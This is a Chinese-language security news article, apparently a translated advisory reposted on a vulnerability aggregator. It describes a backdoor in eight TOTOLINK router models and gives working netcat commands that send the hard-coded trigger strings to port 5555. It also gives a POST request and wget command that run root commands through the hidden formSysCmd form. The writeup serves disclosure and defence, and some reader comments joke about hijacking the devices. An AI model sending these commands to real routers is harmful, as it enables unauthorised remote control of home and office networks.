CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

totolink

2017年5月23日 790点热度 0人点赞 0条评论

totolink

  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

  • 文章撰写

  • 投稿管理

占据韩国80%市场的TOTOLINK路由器被曝存在后门,影响5万路由器

鸢尾2015-07-17+6共194627人围观 ,发现 19 个不明物体漏洞资讯

TOTOLINK路由器在韩国市场占有率达82.3%。由深圳众唐科技公司负责产品的研发、制造。

漏洞简述

通过分析最近一次的固件以及在真实路由器上进行测试后,研究人员发现8款TOTOLink产品中存在后门。

注:固件来自totolink.net以及totolink.cn

A850R-V1 : 最新固件 TOTOLINK-A850R-V1.0.1-B20150707.1612.web
F1-V2 : 最新固件 F1-V2.1.1-B20150708.1646.web
F2-V1 : 最新固件 F2-V2.1.0-B20150320.1611.web
N150RT-V2 : 最新固件 TOTOLINK-N150RT-V2.1.1-B20150708.1548.web
N151RT-V2 : 最新固件 TOTOLINK-N151RT-V2.1.1-B20150708.1559.web
N300RH-V2 : 最新固件 TOTOLINK-N300RH-V2.0.1-B20150708.1625.web
N300RH-V3 : 最新固件 TOTOLINK-N300RH-V3.0.0-B20150331.0858.web
N300RT-V2 : 最新固件 TOTOLINK-N300RT-V2.1.1-B20150708.1613.web

通过向WAN IP发送一个精心构造的请求,攻击者可以在网上打开HTTP远程管理界面。接着攻击者在HTTP原创管理界面中通过hidden/boafrm/formSysCmd形式使用远程代码执行,进而绕过认证系统。

初步估计大约有5万路由器受到后门影响。

后门细节

当路由器启动后会int.d脚本会执行/bin/skt文件

cat etc/init.d/rcS
[...]
# start web server
boa
skt&

skt是一个MIPS架构文件,其参数:

server: ./skt
client: ./skt host cmd

使用模拟器,该二进制文件可以兼容 x86_64机器: sudo chroot . ./qemu-mips-static ./bin/skt

单独使用skt不带任何参数,将会启用一个端口为5555的TCP保护程序,担当回显服务器的角色。使用带参数的skt将通过5555端口向目标IP发送一个包含命令的TCP包。

skt的主要功能:

TcpClient是一个简单的TCP客户端
TcpServer就像一个回显服务器

TcpClient:将发送一个包含hel,xasf, oki,xasf 或者 bye,xasf的TCP包,这取决于使用的参数(1,2,3)

TcpServer:用来监听tcp/5555的回显服务器并比较用户提供的硬编码字符串("hel,xasf", "oki,xasf").

sub_400B50函数:

sub_400B50函数的伪代码:

int32_t sub_400B50(int32_t a1, char *str, int32_t a3, int32_t a4, int32_t a5) {
    if (strcmp(str, "hel,xasf") == 0) {
        system("iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT");
    } else {
        if (strcmp(str, "oki,xasf") == 0) {
            system("iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT");
        }
    }
    [...]
}

该函数比较用户指定的字符串,2个硬编码字符串执行system()。

分析运行在TOTOLINK设备上的二进制文件,显示服务器通过静默执行system()响应命令

1.通过将 "hel,xasf"发送给设备,设备将执行:

iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT

这将在eth1接口(默认的WAN接口)80端口打开HTTP远程管理界面

2.通过将"oki,xasf"发送给设备,设备将执行:

iptables -D INPUT -p tcp –dport 80 -i eth1 -j ACCEPT

这是关闭HTTP原创管理界面

3.通过发送"bye,xasf"给设备,设备什么都不会做。

后门中的iptables命令都是"eth1"的硬编码,只有使用DHCP以及静态IP连接的设备才会受到影响,因为WAN IP依赖于eth1设备,而对于PPPoE连接没有任何影响

totolink# ifconfig
ppp0      Link encap:Point-to-Point Protocol  
          inet addr:X.X.X.X  P-t-P:X.X.X.X  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1438  Metric:1
          RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:64 
          RX bytes:2803138455 (2.6 GiB)  TX bytes:277402492 (264.5 MiB)

攻击者可以使用简单的netcat命令来测试后门:

1.打开HTTP远程管理界面

echo -ne "hel,xasf" | nc <ip> 5555

2.关闭HTTP远程管理界面

echo -ne "oki,xasf" | nc <ip> 5555

3.检测含漏洞路由器

echo -ne "GET / HTTP/1.1" | nc <ip> 5555
if you see "GET / HTTP/1.1" in the answer, you likely detected a vulnerable router.

通过后门打开HTTP远程管理界面:

路由器管理页面中的远程命令执行漏洞

在最新固件中一个隐藏窗口允许攻击者以root权限执行命令:

POST /boafrm/formSysCmd HTTP/1.1
sysCmd=<cmd>&apply=Apply&msg=

攻击者可以使用wget在远程设备中执行命令:

wget --post-data='sysCmd=<cmd>&apply=Apply&msg=' http://ip//boafrm/formSysCmd

例如,向管理界面发送该HTTP请求,可以远程重启设备:

POST /boafrm/formSysCmd HTTP/1.1
sysCmd=reboot&apply=Apply&msg=

下面的wget命令和上面的命令类似:

wget --post-data='sysCmd=reboot&apply=Apply&msg=' http://ip//boafrm/formSysCmd

*参考来源github,译者/鸢尾 转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

鸢尾

鸢尾169 篇文章等级: 8级
|
|
  • 上一篇:黑客论坛Darkode被FBI拔网线,超过70人被捕
  • 下一篇:美国UCLA医院遭黑客入侵,450万份医疗记录或泄露

这些评论亮了

  • 浑浑噩噩的暑假生活回复
    做马桶的TOTO都开始做路由器了?
    )8(亮了
发表评论

已有 19 条评论

  • sds 2015-07-18回复1楼

    我房东的路由就是TOTOlink有的玩了

    亮了(1)
  • 过路人 2015-07-18回复2楼

    这个难道不是用于官方远程售后维护?

    亮了(1)
  • Hiller (1级) 2015-07-18回复3楼

    所有的路由器都是有后门的~~

    亮了(1)
  • 话不要乱说 2015-07-18回复4楼

    80%?尼玛韩国用的最多的是iptime好么。

    亮了(2)
    • filefox (3级) 2015-07-20回复

      @ 话不要乱说 iptime 和 totolink不是同一家么?

      亮了(1)
      • 一个路由爱好者 2015-07-20回复

        @ filefox  iptime是韩国的,totolink是吉翁做的,韩国人在中国办的品牌,totolink和iptime是合作关系,totolink借助iptime的后台势力而已,很丑陋的

        亮了(0)
  • 浑浑噩噩的暑假生活 2015-07-18回复5楼

    做马桶的TOTO都开始做路由器了?

    亮了(8)
  • Sunshine_Ricardo 2015-07-18回复6楼

    韩国百分之80只有五万?

    亮了(4)
  • Pain不想说太多 2015-07-18回复7楼

    5万养鸡场了吧[笑cry]

    亮了(1)
  • 忧伤泛滥的年代 2015-07-18回复8楼

    我擦,我就是安装的这款路由器[崩溃]

    亮了(0)
  • 打酱油 2015-07-19回复9楼

    360路由器你们说有后门,TP-LINK路由器你们也说有后门,小米路由器你们还是说有后门,请问什么路由器没有后门?有后门和你有毛关系

    亮了(0)
  • 乱说 2015-07-19回复10楼

    费什么话,抓鸡去。

    亮了(1)
  • 郑勇Hack 2015-07-19回复11楼

    谷歌打不开 请赐教

    亮了(0)
  • Colbert (1级)男人扣吧扣吧,不是罪 2015-07-20回复12楼

    后门啊,开发兄弟V5

    亮了(1)
  • Fiend520 (7级) 2015-07-20回复13楼

    又是路由器

    亮了(0)
  • xvxsx 2015-07-20回复14楼

    你是打广告的吧 TOTOLINK路由器在韩国市场占有率达82.3%。由深圳众唐科技公司负责产品的研发、制造。 呵呵 你懂得

    亮了(0)
  • xvxsx 2015-07-20回复15楼

    韩国80%市场=5W路由器?

    亮了(0)
  • idc巨人网络 2015-07-19回复16楼

    不能啊 goole域名是多少啊

    亮了(0)
  • 巨人IDC 2015-07-19回复17楼

    不能啊 goole域名是多少啊

    亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

鸢尾

鸢尾

打码改变人生

169 篇文章124 条评论

相关阅读

  • 高通曝Quadrooter高危漏洞, 影响全球9亿安卓用户
  • 世界排名第一的电子商务系统Magento曝远程代码执行漏洞
  • [揭秘]卡扎菲的专属黑客部队
  • 英国军情五处和六处招聘中文情报人员
  • 数千Linux和FreeBSD服务器感染Mumblehard恶意软件

特别推荐

关注我们 分享每日精选文章

不容错过

  • 让你家的楼宇门变聪明:基于树莓派实现任意终端控制楼宇门豆豆青春不喂狗2015-11-27
  • 专访腾讯TSRC新锐奖得主、挖洞新星instruderFB独家2013-10-10
  • 肖恩·帕克:从黑客到亿万富翁hujias2015-07-05
  • 【回播已更新】 FreeBuf公开课(直播课程):Android组件与数据存储安全分析及实战banish2015-11-19

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me